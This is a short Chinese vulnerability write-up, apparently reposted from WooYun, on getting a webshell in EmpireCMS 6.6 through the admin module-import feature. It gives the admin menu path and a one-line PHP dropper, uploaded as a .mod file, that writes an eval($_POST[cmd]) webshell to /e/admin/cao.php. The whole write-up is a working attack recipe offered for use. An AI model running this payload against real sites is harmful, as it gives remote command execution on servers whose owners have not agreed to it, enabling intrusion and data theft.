帝国(EmpireCMS)cms 6.6 后台拿shell

简要描述：

以前6.5的有人发的方法是，（进入后台—系统设置—管理数据表—管理系统模型—导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传，新版使用uploadm~num.php来递增数字）

详细说明：

以 前6.5的有人发的方法是，（进入后台—系统设置—管理数据表—管理系统模型—导入新型模 块,直接把修改过的php的shell改名为shell.php.mod上传，新版使用uploadm~num.php来递增数字）发现6.6不行，上传 之后会变成类似uploadm1324885505nXmTdQamQq.php这样的！

漏洞证明：

换 了个办法其实也很简 单<?fputs(fopen(“cao.php”,”w”),”<?eval(/$_POST[cmd]);?>”)?> 保存为1.php.mod 然后还是进入后台—系统设置—管理数据表—管理系统模型—导入新型模块，上传之后马儿就躺在了/e/admin/cao.php了

本文转自wooyun由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及原作者版权信息。